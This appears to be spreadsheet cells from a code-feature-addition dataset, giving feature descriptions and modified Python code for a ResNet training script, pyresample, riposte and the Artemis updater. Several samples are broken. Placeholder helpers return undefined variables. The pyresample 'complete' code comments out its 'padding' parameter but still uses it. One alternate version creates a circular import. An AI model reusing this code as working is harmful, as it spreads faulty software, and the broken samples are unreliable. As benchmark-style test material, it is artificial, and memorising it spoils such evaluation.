    <t>{'#file 1': 'def resnet_model_fn(features, labels, mode, params):\n  """Model function for CIFAR-10."""\n  features = tf.reshape(features, [-1, _IMAGE_SIZE, _IMAGE_SIZE, _NUM_CHANNELS])\n\n  if params[\'fine_tune\']:\n    warmup = False\n    base_lr = .1\n  else:\n    warmup = True\n    base_lr = .128\n\n  #Modify: Invoke new feature function\n  new_feature_result = new_feature_function(params)\n  learning_rate_fn = resnet_run_loop.learning_rate_with_decay(\n      batch_size=params[\'batch_size\'],\n      batch_denom=256,\n      num_images=_NUM_IMAGES[\'train\'],\n      boundary_epochs=[30, 60, 80, 90],\n      decay_rates=[1, 0.1, 0.01, 0.001, 1e-4],\n      warmup=warmup,\n      base_lr=base_lr * new_feature_result)\n\n  # We use a weight decay of 0.0002, which performs better\n  # than the 0.0001 that was originally suggested.\n  weight_decay = 2e-4\n\n  # Empirical testing showed that including batch_normalization variables\n  # in the calculation of regularized loss helped validation accuracy\n  # for the CIFAR-10 dataset, perhaps because the regularization prevents\n  # overfitting on the small data set. We therefore include all vars when\n  # regularizing and computing loss during training.\n  def loss_filter_fn(_):\n    return True\n\n  return resnet_run_loop.resnet_model_fn(\n      features=features,\n      labels=labels,\n      mode=mode,\n      model_class=Model,\n      resnet_size=params[\'resnet_size\'],\n      weight_decay=weight_decay,\n      learning_rate_fn=learning_rate_fn,\n      momentum=0.9,\n      data_format=params[\'data_format\'],\n      resnet_version=params[\'resnet_version\'],\n      loss_scale=params[\'loss_scale\'],\n      loss_filter_fn=loss_filter_fn,\n      dtype=params[\'dtype\'],\n      fine_tune=params[\'fine_tune\']\n  )', '#file 2': 'def run_nsfw(flags_obj):\n  input_function = input_fn\n  resnet_run_loop.resnet_main(\n      flags_obj,\n      nsfw_model_fn,\n      input_function,\n      DATASET_NAME,\n      shape=[_IMAGE_SIZE, _IMAGE_SIZE, _NUM_CHANNELS])', '#file 3': 'def main(_):\n  run_nsfw(flags.FLAGS)', '#file 4': 'def new_feature_function(params):\n  """New feature function to be added."""\n  # New feature implementation\n  # Example: Adjust learning rate based on performance\n  performance_metric = calculate_performance_metric(params)\n  new_feature_result = adjust_learning_rate(performance_metric)\n  return new_feature_result\n\n#New: Helper functions for new feature\ndef calculate_performance_metric(params):\n  # Calculate performance metric based on params\n  return performance_metric\n\ndef adjust_learning_rate(performance_metric):\n  # Adjust learning rate based on performance metric\n  return adjusted_learning_rate'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'get_area_slices function in pyresample/future/geometry/_subset.py', 'invoking_code_segment': 'cache_to_json_if decorator and _hash_args function in pyresample/_caching.py', 'feature_description': 'Add padding to the area slices by introducing an optional padding parameter to get_area_slices function that allows users to expand the computed slices by a specified number of pixels in all directions', 'modified_complete_code': '# File 1: pyresample/pyresample/future/geometry/_subset.py\n\n@cache_to_json_if("cache_geometry_slices")\ndef get_area_slices(\n        src_area: AreaDefinition,\n        area_to_cover: AreaDefinition,\n        shape_divisible_by: int | None,\n        #New padding: int | None = None,\n) -&gt; tuple[slice, slice]:\n    """Compute the slice to read based on an `area_to_cover`.\n    \n    #New Parameters\n    #New ----------\n    #New padding : int, optional\n    #New     Number of pixels to pad around the computed slices.\n    #New     If provided, expands the slices in all directions.\n    """\n    if not _is_area_like(src_area):\n        raise NotImplementedError(f"Only AreaDefinitions are supported, not {type(src_area)}")\n    if not _is_area_like(area_to_cover):\n        raise NotImplementedError(f"Only AreaDefinitions are supported, not {type(area_to_cover)}")\n\n    proj_def_to_cover = area_to_cover.crs\n    proj_def = src_area.crs\n    if proj_def_to_cover == proj_def:\n        logger.debug(\'Projections for data and slice areas are identical: %s\',\n                     proj_def_to_cover)\n        xstart, xstop, ystart, ystop = _get_slice_starts_stops(src_area, area_to_cover)\n\n        x_slice = check_slice_orientation(slice(xstart, xstop))\n        y_slice = check_slice_orientation(slice(ystart, ystop))\n        x_slice = _ensure_integer_slice(x_slice)\n        y_slice = _ensure_integer_slice(y_slice)\n        #New x_slice, y_slice = _apply_padding(x_slice, y_slice, src_area, padding)\n        return x_slice, y_slice\n\n    data_boundary = _get_area_boundary(src_area)\n    area_boundary = _get_area_boundary(area_to_cover)\n    intersection = data_boundary.contour_poly.intersection(\n        area_boundary.contour_poly)\n    if intersection is None:\n        logger.debug(\'Cannot determine appropriate slicing. \'\n                     "Data and projection area do not overlap.")\n        raise NotImplementedError\n    x, y = src_area.get_array_indices_from_lonlat(\n        np.rad2deg(intersection.lon), np.rad2deg(intersection.lat))\n    x_slice = slice(np.ma.min(x), np.ma.max(x) + 1)\n    y_slice = slice(np.ma.min(y), np.ma.max(y) + 1)\n    x_slice = _ensure_integer_slice(x_slice)\n    y_slice = _ensure_integer_slice(y_slice)\n    if shape_divisible_by is not None:\n        x_slice = _make_slice_divisible(x_slice, src_area.width,\n                                        factor=shape_divisible_by)\n        y_slice = _make_slice_divisible(y_slice, src_area.height,\n                                        factor=shape_divisible_by)\n\n    #New x_slice, y_slice = _apply_padding(x_slice, y_slice, src_area, padding)\n    return (check_slice_orientation(x_slice),\n            check_slice_orientation(y_slice))\n\n\n#New def _apply_padding(x_slice: slice, y_slice: slice, src_area: AreaDefinition, padding: int | None) -&gt; tuple[slice, slice]:\n#New     """Apply padding to the computed slices."""\n#New     if padding is None or padding &lt;= 0:\n#New         return x_slice, y_slice\n#New     \n#New     x_start = max(0, x_slice.start - padding)\n#New     x_stop = min(src_area.width, x_slice.stop + padding)\n#New     y_start = max(0, y_slice.start - padding)\n#New     y_stop = min(src_area.height, y_slice.stop + padding)\n#New     \n#New     return slice(x_start, x_stop), slice(y_start, y_stop)\n\n\n# File 2: pyresample/pyresample/_caching.py\n\n#Modify def _hash_args(args: tuple[Any]) -&gt; str:\n    from pyresample.future.geometry import AreaDefinition, SwathDefinition\n    from pyresample.geometry import AreaDefinition as LegacyAreaDefinition\n    from pyresample.geometry import SwathDefinition as LegacySwathDefinition\n\n    hashable_args = []\n    for arg in args:\n        #Modify if isinstance(arg, (SwathDefinition, LegacySwathDefinition)):\n            raise TypeError(f"Unhashable type ({type(arg)})")\n        if isinstance(arg, (AreaDefinition, LegacyAreaDefinition)):\n            arg = hash(arg)\n        #New elif arg is None:\n        #New     arg = "__none__"\n        hashable_args.append(arg)\n    arg_hash = hashlib.sha1()  # nosec\n    arg_hash.update(json.dumps(tuple(hashable_args)).encode("utf8"))\n    return arg_hash.hexdigest()'}</t>
  </si>
  <si>
    <t>{'#file 1': '#Modify\nfrom pyresample.future.geometry._subset import get_area_slices_with_padding\n\ndef get_area_slices(src_area: AreaDefinition, area_to_cover: AreaDefinition, shape_divisible_by: int | None, padding: int = 0) -&gt; tuple[slice, slice]:\n    return get_area_slices_with_padding(src_area, area_to_cover, shape_divisible_by, padding)\n', '#file 2': '#Modify\nfrom pyresample.future.geometry._subset import get_area_slices\n\n# Example usage in a function\ndef some_function(src_area, area_to_cover):\n    slices = get_area_slices(src_area, area_to_cover, shape_divisible_by=2, padding=5)\n    return slices', '#file 3': '#Modify\nfrom pyresample.future.geometry._subset import get_area_slices\n\n# Example usage in another function\ndef another_function(src_area, area_to_cover):\n    slices = get_area_slices(src_area, area_to_cover, shape_divisible_by=None, padding=10)\n    return slices', '#file 4': '#New\nfrom pyresample.future.geometry._subset import get_area_slices\n\ndef get_area_slices_with_padding(src_area: AreaDefinition, area_to_cover: AreaDefinition, shape_divisible_by: int | None, padding: int = 0) -&gt; tuple[slice, slice]:\n    slices = get_area_slices(src_area, area_to_cover, shape_divisible_by)\n    x_slice, y_slice = slices\n    x_slice = slice(max(0, x_slice.start - padding), min(src_area.width, x_slice.stop + padding))\n    y_slice = slice(max(0, y_slice.start - padding), min(src_area.height, y_slice.stop + padding))\n    return x_slice, y_slice'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def get_guides(annotation) -&gt; Tuple[Callable]:\n    """Based on given annotation get chain of guides."""\n    if annotation in (str, AnyStr, Text):\n        return ()\n    elif annotation is bytes:\n        return (encode,)\n    else:\n        return (literal,)', 'invoking_code_segment': 'def extract_guides(func: Callable) -&gt; Dict[str, Tuple[Callable]]:\n    """Extract guides out of type-annotations."""\n    return {\n        arg: get_guides(annotation)\n        for arg, annotation in func.__annotations__.items()\n    }', 'feature_description': 'Add a custom guide function that converts input strings to uppercase. This allows users to define a custom guide function and use it in command annotations to automatically convert string arguments to uppercase.', 'modified_complete_code': '# riposte/riposte/guides.py\nimport ast\nfrom typing import Any, AnyStr, Callable, Dict, Text, Tuple\n\nfrom riposte.exceptions import GuideError\n\n\ndef literal(value: str) -&gt; Any:\n    try:\n        return ast.literal_eval(value)\n    except Exception:\n        raise GuideError(value, literal)\n\n\ndef encode(value: str) -&gt; Any:\n    try:\n        return value.encode()\n    except Exception:\n        raise GuideError(value, encode)\n\n\n# New: Custom guide function to convert strings to uppercase\ndef uppercase(value: str) -&gt; str:\n    """Convert input string to uppercase."""\n    try:\n        return value.upper()\n    except Exception:\n        raise GuideError(value, uppercase)\n\n\ndef get_guides(annotation) -&gt; Tuple[Callable]:\n    """Based on given annotation get chain of guides."""\n\n    if annotation in (str, AnyStr, Text):\n        return ()\n    elif annotation is bytes:\n        return (encode,)\n    # Modify: Added support for custom guide type hint\n    elif hasattr(annotation, \'__name__\') and annotation.__name__ == \'uppercase\':\n        return (uppercase,)\n    else:\n        return (literal,)\n\n\ndef extract_guides(func: Callable) -&gt; Dict[str, Tuple[Callable]]:\n    """Extract guides out of type-annotations."""\n    return {\n        arg: get_guides(annotation)\n        for arg, annotation in func.__annotations__.items()\n    }\n\n\n# riposte/riposte/command.py\nimport inspect\nfrom typing import Callable, Dict, Iterable, List, Sequence\n\nfrom .exceptions import CommandError\nfrom .guides import extract_guides, uppercase\n\n\nclass Command:\n    def __init__(\n        self,\n        name: str,\n        func: Callable,\n        description: str,\n        guides: Dict[str, Iterable[Callable]] = None,\n    ):\n        self.name = name\n        self.description = description\n\n        self._func = func\n        self._completer_function = None\n\n        self._guides = extract_guides(self._func)\n        self._guides.update(guides if guides else {})\n        self._validate_guides()\n\n    def _validate_guides(self) -&gt; None:\n        """Validate guides setup.\n\n        Check if guides setup is valid and raise exception with\n        informative message what is wrong.\n\n        """\n        for parameter, command_guides in self._guides.items():\n            if not isinstance(command_guides, Iterable):\n                raise CommandError(\n                    f"Command \'{self.name}\': guides for parameter "\n                    f"\'{parameter}\' have to be iterable "\n                    f"not \'{type(command_guides)}\'"\n                )\n\n            for guide in command_guides:\n                if not isinstance(guide, Callable):\n                    raise CommandError(\n                        f"Command \'{self.name}\': guide for "\n                        f"parameter \'{parameter}\' have to be "\n                        f"callable not {type(guide)}"\n                    )\n\n    def _process_arguments(self, name: str, *args) -&gt; List:\n        """Process each argument according to selected chain of guides\n\n        Process each argument according to selected chain of guides. Each\n        guide from the collection is applied to the every argument.\n        Guide as input uses output from previous guide e.g.\n\n            guide_3(guide_2(guide_1("scoo")))\n\n        """\n        processed = []\n        for arg in args:\n            for guide in self._guides.get(name, []):\n                arg = guide(arg)\n            processed.append(arg)\n\n        return processed\n\n    def _apply_guides(self, bound_arguments: inspect.BoundArguments) -&gt; List:\n        """Apply guide functions.\n\n        Apply guide functions to values of type `str` delivered by user\n        using `input()`.\n\n        Assumes that `args` have been already validated `_bind_arguments`,\n        hence `args` is matching `_func` signature, (`args &lt;= parameters`)\n\n        """\n        processed = []\n        for name, value in bound_arguments.arguments.items():\n            if (\n                bound_arguments.signature.parameters[name].kind\n                is inspect.Parameter.VAR_POSITIONAL\n            ):\n                arguments = self._process_arguments(name, *value)\n            else:\n                arguments = self._process_arguments(name, value)\n\n            processed.extend(arguments)\n\n        return processed\n\n    def _bind_arguments(self, *args) -&gt; inspect.BoundArguments:\n        """Check whether given `args` match `_func` signature."""\n        try:\n            return inspect.signature(self._func).bind(*args)\n        except TypeError as e:\n            raise CommandError(e)\n\n    def execute(self, *args: str) -&gt; None:\n        """Execute handling function (`self._func`) bound to command.\n\n        In case of argument mismatch during function call we want to give\n        user informative feedback that\'s why we are wrapping\n        `TypeError` with `CommandError`.\n\n        """\n        return self._func(*self._apply_guides(self._bind_arguments(*args)))\n\n    def complete(self, *args, **kwargs) -&gt; Sequence:\n        """Execute completer function bound to this command."""\n\n        if not self._completer_function:\n            return ()\n\n        return self._completer_function(*args, **kwargs)\n\n    def attach_completer(self, completer_function: Callable) -&gt; None:\n        """Attach complater function.\n\n        # TODO: Maybe we should make it @property?\n        """\n        if self._completer_function:\n            raise CommandError(\n                f"Command \'{self.name}\' already has completer function."\n            )\n        self._completer_function = completer_function\n\n    def __str__(self):\n        return self.name\n\n    def __eq__(self, other):\n        return all((self.name == other.name, self._func is other._func))\n\n\n# riposte/tests/test_command.py\nimport inspect\nfrom unittest import mock\n\nimport pytest\n\nfrom riposte.command import Command\nfrom riposte.exceptions import CommandError\nfrom riposte.guides import uppercase\n\n\ndef test_execute(command):\n    args = (1, 2, 3)\n    mocked_bind_arguments = command._bind_arguments = mock.Mock()\n    mocked_apply_guides = command._apply_guides = mock.MagicMock()\n\n    command.execute(*args)\n\n    mocked_bind_arguments.assert_called_once_with(*args)\n    mocked_apply_guides.assert_called_once_with(\n        mocked_bind_arguments.return_value\n    )\n    command._func.assert_called_once_with(*mocked_apply_guides.return_value)\n\n\ndef test_complete(command):\n    args = (1, 2, 3)\n    kwargs = {"scoo": "bee", "doo": "bee"}\n    command._completer_function = mock.Mock()\n\n    command.complete(*args, **kwargs)\n\n    command._completer_function.assert_called_once_with(*args, **kwargs)\n\n\ndef test_attach_completer(command):\n    completer_function = mock.Mock()\n\n    command.attach_completer(completer_function)\n\n    assert command._completer_function is completer_function\n\n\ndef test_attach_completer_already_attached(command):\n    command._completer_function = mock.Mock()\n\n    with pytest.raises(CommandError):\n        command.attach_completer(mock.Mock())\n\n\n@mock.patch("riposte.command.extract_guides")\ndef test_command_setup_guides_validate(mocked_extract_guides):\n    with mock.patch.object(\n        Command, "_validate_guides"\n    ) as mocked_validate_guides:\n        Command("foo", mock.Mock(), "description")\n\n        mocked_validate_guides.assert_called_once_with()\n\n\n@mock.patch(\n    "riposte.command.extract_guides", return_value={"foo": (mock.Mock(),)}\n)\ndef test_command_setup_guides_extract(mocked_extract_guides):\n    func = mock.Mock()\n\n    command = Command("foo", func, "description")\n\n    mocked_extract_guides.assert_called_once_with(func)\n    assert command._guides == mocked_extract_guides.return_value\n\n\n@mock.patch(\n    "riposte.command.extract_guides", return_value={"foo": (mock.Mock(),)}\n)\ndef test_command_setup_guides_update(mocked_extract_guides):\n    func = mock.Mock()\n    guides = {"foo": [str], "bar": [str]}\n\n    command = Command("foo", func, "description", guides=guides)\n\n    mocked_extract_guides.assert_called_once_with(func)\n    assert command._guides == guides\n\n\ndef test_apply_guides(command):\n    def foo(x: int, *args: int):\n        pass\n\n    command._func = foo\n    args = ("1", "2", "3")\n    command._process_arguments = mock.Mock(side_effect=([1], [2, 3]))\n    bound_arguments = inspect.signature(foo).bind(*args)\n\n    assert command._apply_guides(bound_arguments) == [1, 2, 3]\n    assert command._process_arguments.call_args_list == [\n        mock.call("x", "1"),\n        mock.call("args", "2", "3"),\n    ]\n\n\n@pytest.mark.parametrize("guides", (1, "str", (int), [2.0]))\ndef test_validate_guides(command, guides):\n    command._guides = {"foo": guides}\n    with pytest.raises(CommandError):\n        command._validate_guides()\n\n\n@mock.patch("riposte.command.inspect", new_callable=mock.MagicMock)\ndef test_bind_arguments(inspect_mock, command):\n    args = (1, 2)\n    command._bind_arguments(*args)\n\n    inspect_mock.signature.assert_called_once_with(command._func)\n    inspect_mock.signature.return_value.bind.assert_called_once_with(*args)\n\n\n@mock.patch("riposte.command.inspect", new_callable=mock.MagicMock)\ndef test_bind_arguments_exception(inspect_mock, command):\n    args = (1, 2)\n    inspect_mock.signature.return_value.bind.side_effect = TypeError\n\n    with pytest.raises(CommandError):\n        command._bind_arguments(*args)\n\n    inspect_mock.signature.assert_called_once_with(command._func)\n    inspect_mock.signature.return_value.bind.assert_called_once_with(*args)\n\n\n@pytest.mark.parametrize(\n    "args, guides, expected_value",\n    (\n        (("1",), {}, ["1"]),\n        (("1",), {"foo": (lambda x: x + "_",)}, ["1_"]),\n        (("1", "2"), {"foo": (lambda x: x + "_",)}, ["1_", "2_"]),\n        (\n            ("1", "2"),\n            {"foo": (lambda x: x + "_", lambda x: x + "@")},\n            ["1_@", "2_@"],\n        ),\n    ),\n)\ndef test_process_arguments(args, guides, expected_value, command):\n    command._guides = guides\n    assert command._process_arguments("foo", *args) == expected_value\n\n\n# New: Test for uppercase guide function\n@pytest.mark.parametrize(\n    "args, guides, expected_value",\n    (\n        (("hello",), {"foo": (uppercase,)}, ["HELLO"]),\n        (("hello", "world"), {"foo": (uppercase,)}, ["HELLO", "WORLD"]),\n    ),\n)\ndef test_process_arguments_uppercase(args, guides, expected_value, command):\n    command._guides = guides\n    assert command._process_arguments("foo", *args) == expected_value'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def extract_guides(func: Callable) -&gt; Dict[str, Tuple[Callable]]:\n    return {\n        arg: get_guides(annotation)\n        for arg, annotation in func.__annotations__.items()\n    }', '#file 2': 'def __init__(self, name: str, func: Callable, description: str, guides: Dict[str, Iterable[Callable]] = None):\n    self.name = name\n    self.description = description\n    self._func = func\n    self._completer_function = None\n    self._guides = extract_guides(self._func)\n    self._guides.update(guides if guides else {})\n    self._validate_guides()', '#file 3': 'def test_command_setup_guides_extract(mocked_extract_guides):\n    func = mock.Mock()\n    guides = {\'foo\': [custom_guide]}\n    command = Command("foo", func, "description", guides=guides)\n    mocked_extract_guides.assert_called_once_with(func)\n    assert command._guides == guides', '#file 4': 'def custom_guide(value: str) -&gt; Any:\n    try:\n        return value.upper()\n    except Exception:\n        raise GuideError(value, custom_guide)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'UpdateManager.check_updates() method in artemis/utils/update_utils.py', 'invoking_code_segment': 'UIArtemis.__init__() and UIArtemis.check_for_update() methods in artemis/ui/artemis.py', 'feature_description': 'Add logging functionality to track update checks, including timestamps, check results (DB update available, Artemis update available, or up-to-date status), and any errors encountered during the update check process.', 'modified_complete_code': '# File 1: artemis/utils/update_utils.py\nimport uuid\nimport requests\nimport logging\nfrom datetime import datetime\n\nfrom packaging.version import Version\n\nfrom artemis.utils.constants import Constants, Messages\nfrom artemis.utils.sys_utils import is_windows, is_linux, is_macos, delete_file, match_hash, unpack_tar, open_file\nfrom artemis.utils.path_utils import DATA_DIR, TMP_DIR\n\n# New: Initialize logger for update checks\nlogger = logging.getLogger(__name__)\n\nclass UpdateManager:\n    """ Class used to manage DB and software updates\n    """\n\n    def __init__(self, parent):\n        self._parent = parent\n\n        self.db_update = None\n        self.art_update = None\n\n        self.remote_db_url = None\n        self.remote_db_hash = None\n        self.remote_db_version = None\n        self.remote_db_size = None\n        self.remote_db_file_name = None\n\n        self.remote_artemis_version = None\n        self.remote_artemis_url = None\n        self.remote_artemis_file_name = None\n\n        self.check_updates()\n\n    # Modify: Updated check_updates method with logging\n    def check_updates(self, show_popup=False):\n        """ Checks if a software or DB update is available.\n            Prioritize Artemis updates over the DB one.\n            Logs all update check activities.\n\n            Args:\n                show_popup (bool, optional): \n                    If False, suppress the "already up-to-date" message on startup.\n                    Defaults to False. True is usefull when the user manual check for\n                    updates.\n        """\n        # New: Log update check initiation\n        logger.info(f"Update check initiated at {datetime.now().isoformat()}")\n        \n        latest_json = self.fetch_remote_json(Constants.LATEST_VERSION_URL, show_popup)\n        if latest_json:\n            local_db = self._parent.dbmanager.get_latest_local_sigid_db()\n            remote_db = latest_json[\'sigID_DB\']\n\n            self.remote_db_version = remote_db[\'version\']\n            self.remote_db_url = remote_db[\'url\']\n            self.remote_db_hash = remote_db[\'sha256_hash\']\n            self.remote_db_size = remote_db[\'total_bytes\']\n            self.remote_db_file_name = self.remote_db_url.split(\'/\')[-1]\n\n            if is_windows():\n                self.remote_artemis_version = latest_json[\'windows\'][\'version\']\n                self.remote_artemis_url = latest_json[\'windows\'][\'url\']\n            elif is_linux():\n                self.remote_artemis_version = latest_json[\'linux\'][\'version\']\n                self.remote_artemis_url = latest_json[\'linux\'][\'url\']\n            elif is_macos():\n                self.remote_artemis_version = latest_json[\'mac\'][\'version\']\n                self.remote_artemis_url = latest_json[\'mac\'][\'url\']\n            \n            self.remote_artemis_file_name = self.remote_artemis_url.split(\'/\')[-1]\n\n            if Version(self.remote_artemis_version) &gt; Version(Constants.APPLICATION_VERSION):\n                self.art_update = True\n                # New: Log Artemis update availability\n                logger.info(f"Artemis update available: {Constants.APPLICATION_VERSION} -&gt; {self.remote_artemis_version}")\n            else:\n                self.art_update = False\n                # New: Log Artemis is up-to-date\n                logger.info(f"Artemis is up-to-date: {Constants.APPLICATION_VERSION}")\n\n            if self.art_update:\n                self._show_popup_art_update()\n            else:\n                if local_db:\n                    if self.remote_db_version &gt; local_db.version:\n                        # New: Log DB update availability\n                        logger.info(f"Database update available: {local_db.version} -&gt; {self.remote_db_version}")\n                        self._show_popup_db_update()\n                    elif show_popup:\n                        # New: Log database is up-to-date\n                        logger.info(f"Database is up-to-date: {local_db.version}")\n                        self._show_popup_up_to_date()\n                else:\n                    # New: Log no database detected\n                    logger.info("No local database detected. Initial download required.")\n                    self._show_popup_initial_db_download()\n        else:\n            # New: Log failed update check\n            logger.warning("Update check failed: Unable to fetch remote version information")\n\n    # Modify: Updated fetch_remote_json method with logging\n    def fetch_remote_json(self, url, show_popup=False):\n        """ Fetches the remote json from a url\n\n            Args:\n                url (str): URL to fetch JSON from\n                show_popup (bool, optional): If false, suppress any error message\n                Defaults to False (to avoid error if the program is used offline)\n        """\n        try:\n            response = requests.get(url)\n            response.raise_for_status()\n            # New: Log successful fetch\n            logger.debug(f"Successfully fetched remote version data from {url}")\n            return response.json()\n        except requests.exceptions.RequestException as e:\n            # New: Log fetch error\n            logger.error(f"Failed to fetch remote version data from {url}: {str(e)}")\n            if show_popup:\n                self._parent.dialog_popup(\n                    Messages.DIALOG_TYPE_ERROR,\n                    Messages.NO_CONNECTION,\n                    Messages.NO_CONNECTION_MSG.format(e)\n                )\n            return None\n\n    def download_db(self):\n        """ Open the downloader and download the sigID database in the \n            TMP_DIR folder. After a succesfull download the callback function\n            from the downloader is post_download_db\n        """\n        # New: Log database download initiation\n        logger.info(f"Database download initiated for version {self.remote_db_version}")\n        self._parent.downloader.finished.connect(self.post_download_db)\n        self._parent.downloader.on_start(\n            self.remote_db_url,\n            TMP_DIR\n        )\n\n    def post_download_db(self):\n        """ After a succesfull DB download, this function check the hash\n            for possible corrupted data, delete old sigID DB and extract\n            the new one\n        """\n        latest_db_tar_path = TMP_DIR / self.remote_db_file_name\n        if match_hash(latest_db_tar_path, self.remote_db_hash):\n            # New: Log successful hash verification\n            logger.info(f"Database hash verification successful for {self.remote_db_file_name}")\n            db_dir_name = str(uuid.uuid4())\n            unpack_tar(latest_db_tar_path, DATA_DIR / db_dir_name)\n            self._parent.load_db(db_dir_name)\n            # New: Log successful database extraction\n            logger.info(f"Database successfully extracted and loaded: {db_dir_name}")\n            self._show_popup_db_download_complete()\n        else:\n            # New: Log hash verification failure\n            logger.error(f"Database hash verification failed for {self.remote_db_file_name}")\n            self._show_popup_db_hash_failed()\n        delete_file(latest_db_tar_path)\n\n    def download_artemis(self):\n        """ Open the downloader and download Artemis in the \n            TMP_DIR folder. After a succesfull download the callback function\n            from the downloader is post_download_artemis\n        """\n        # New: Log Artemis download initiation\n        logger.info(f"Artemis download initiated for version {self.remote_artemis_version}")\n        self._parent.downloader.finished.connect(self.post_download_artemis)\n        self._parent.downloader.on_start(\n            self.remote_artemis_url,\n            TMP_DIR\n        )\n\n    def post_download_artemis(self):\n        """ After a succesfull Artemis download, this open the installer\n            and close the application\n        """\n        if is_windows():\n            # New: Log Artemis installer execution\n            logger.info(f"Artemis installer opened: {self.remote_artemis_file_name}")\n            open_file(TMP_DIR / self.remote_artemis_file_name)\n            self._parent.close_ui.emit()\n\n    def _show_popup_db_update(self):\n        """ Prompts the user to download the updated version of the database\n        """\n        self._parent.dialog_download_db(\n            Messages.DIALOG_TYPE_WARN,\n            Messages.DB_NEW_VER,\n            Messages.DB_NEW_VER_MSG.format(self.remote_db_version)\n        )\n\n    def _show_popup_art_update(self):\n        """ Alerts the user of a new version of Artemis.\n            Windows - asks to download with automatic update\n            Linux, macOS - redirects to GitHub page\n        """\n        if is_windows():\n            self._parent.dialog_update_artemis(\n                Messages.DIALOG_TYPE_QUEST,\n                Messages.ART_NEW_VER,\n                Messages.ART_NEW_VER_AUTO_MSG.format(self.remote_artemis_version),\n                True\n            )\n        else:\n            self._parent.dialog_update_artemis(\n                Messages.DIALOG_TYPE_QUEST,\n                Messages.ART_NEW_VER,\n                Messages.ART_NEW_VER_MANUAL_MSG.format(self.remote_artemis_version),\n                False\n            )\n\n    def _show_popup_up_to_date(self):\n        """ Notifies the user that the database is up to date\n        """\n        self._parent.dialog_popup(\n            Messages.DIALOG_TYPE_INFO,\n            Messages.UP_TO_DATE,\n            Messages.UP_TO_DATE_MSG\n        )\n\n    def _show_popup_initial_db_download(self):\n        """ Prompts the user to download the database for the first time\n        """\n        self._parent.dialog_download_db(\n            Messages.DIALOG_TYPE_QUEST,\n            Messages.NO_DB_DETECTED,\n            Messages.NO_DB_DETECTED_MSG\n        )\n\n    def _show_popup_db_download_complete(self):\n        """ DB has been succesfully downloaded\n        """\n        self._parent.dialog_popup(\n            Messages.DIALOG_TYPE_INFO,\n            Messages.GENERIC_SUCCESS,\n            Messages.DB_DOWNLOAD_SUCCESS_MSG\n        )\n\n    def _show_popup_db_hash_failed(self):\n        """ Notify the user after detection of a corrupted database\n        """\n        self._parent.dialog_popup(\n            Messages.DIALOG_TYPE_ERROR,\n            Messages.DB_CORRUPTED,\n            Messages.DB_CORRUPTED_MSG\n        )\n\n# File 2: artemis/ui/artemis.py (relevant sections with modifications)\n# Modify: Added logging import at the top\nimport logging\n\n# New: Initialize logger for UI operations\nlogger = logging.getLogger(__name__)\n\nclass UIArtemis(QObject):\n    # ... existing code ...\n    \n    def __init__(self):\n        super().__init__()\n        # New: Log application initialization\n        logger.info("UIArtemis initialization started")\n        \n        # Main UI initialization\n        self._engine = QQmlApplicationEngine()\n        self._engine.rootContext().setContextProperty(\'APPLICATION_VERSION\', Constants.APPLICATION_VERSION)\n        self._engine.rootContext().setContextProperty(\'PYTHON_VERSION\', Constants.PYTHON_VERSION)\n        self._engine.rootContext().setContextProperty(\'QT_VERSION\', Constants.QT_VERSION)\n        self._engine.load(\'qrc:/ui/Artemis.qml\')\n        self._window = self._engine.rootObjects()[0]\n\n        self._window_filter = self._window.findChild(QObject, "filterPageObj")\n        self._window_signal = self._window.findChild(QObject, "signalPageObj")\n\n        self.loaded_db = None\n\n        self._connect()\n\n        # Creating istances for other windows\n        self.preferences = UIPreferences(self)\n        self.dbmanager = UIdbmanager(self)\n        self.spaceweather = UIspaceweather(self)\n        self.docmanager = UIdocumentsmanager(self)\n        self.sigeditor = UIsignaleditor(self)\n        self.cateditor = UIcategoryeditor(self)\n        self.downloader = UIDownloader(self)\n\n        self.update_manager = UpdateManager(self)\n        # New: Log update manager initialization\n        logger.info("UpdateManager initialized")\n\n        self.autoload_db()\n        # New: Log initialization complete\n        logger.info("UIArtemis initialization completed")\n\n    # Modify: Updated check_for_update method with logging\n    def check_for_update(self):\n        """ User manual check for updates\n        """\n        # New: Log manual update check\n        logger.info("Manual update check initiated by user")\n        self.update_manager.check_updates(True)\n'}</t>
  </si>
  <si>
    <t>{'file_1': "def check_updates(self, show_popup=False):\n    latest_json = self.fetch_remote_json(Constants.LATEST_VERSION_URL, show_popup)\n    if latest_json:\n        local_db = self._parent.dbmanager.get_latest_local_sigid_db()\n        remote_db = latest_json['sigID_DB']\n\n        self.remote_db_version = remote_db['version']\n        self.remote_db_url = remote_db['url']\n        self.remote_db_hash = remote_db['sha256_hash']\n        self.remote_db_size = remote_db['total_bytes']\n        self.remote_db_file_name = self.remote_db_url.split('/')[-1]\n\n        if is_windows():\n            self.remote_artemis_version = latest_json['windows']['version']\n            self.remote_artemis_url = latest_json['windows']['url']\n        elif is_linux():\n            self.remote_artemis_version = latest_json['linux']['version']\n            self.remote_artemis_url = latest_json['linux']['url']\n        elif is_macos():\n            self.remote_artemis_version = latest_json['mac']['version']\n            self.remote_artemis_url = latest_json['mac']['url']\n        \n        self.remote_artemis_file_name = self.remote_artemis_url.split('/')[-1]\n\n        if Version(self.remote_artemis_version) &gt; Version(Constants.APPLICATION_VERSION):\n            self.art_update = True\n        else:\n            self.art_update = False         \n\n        if self.art_update:\n            self._show_popup_art_update()\n        else:\n            if local_db:\n                if self.remote_db_version &gt; local_db.version:\n                    self._show_popup_db_update()\n                elif show_popup:\n                    self._show_popup_up_to_date()\n            else:\n                self._show_popup_initial_db_download()\n\n        #Modify\n        self._parent.new_feature_manager.new_feature_function()", 'file_2': 'def check_for_update(self):\n    self.update_manager.check_updates(True)\n\n    #Modify\n    self.new_feature_manager.new_feature_function()', 'file_3': 'def __init__(self, parent):\n    self._parent = parent\n\n    self.db_update = None\n    self.art_update = None\n\n    self.remote_db_url = None\n    self.remote_db_hash = None\n    self.remote_db_version = None\n    self.remote_db_size = None\n    self.remote_db_file_name = None\n\n    self.remote_artemis_version = None\n    self.remote_artemis_url = None\n    self.remote_artemis_file_name = None\n\n    self.check_updates()\n\n    #Modify\n    self.new_feature_manager = NewFeatureManager(self._parent)', 'file_4': "class NewFeatureManager:\n    def __init__(self, parent):\n        self._parent = parent\n\n    def new_feature_function(self):\n        # New feature implementation\n        with open('update_log.txt', 'a') as log_file:\n            log_file.write(f'Update check at {datetime.datetime.now()}\\n')"}</t>
  </si>
  <si>
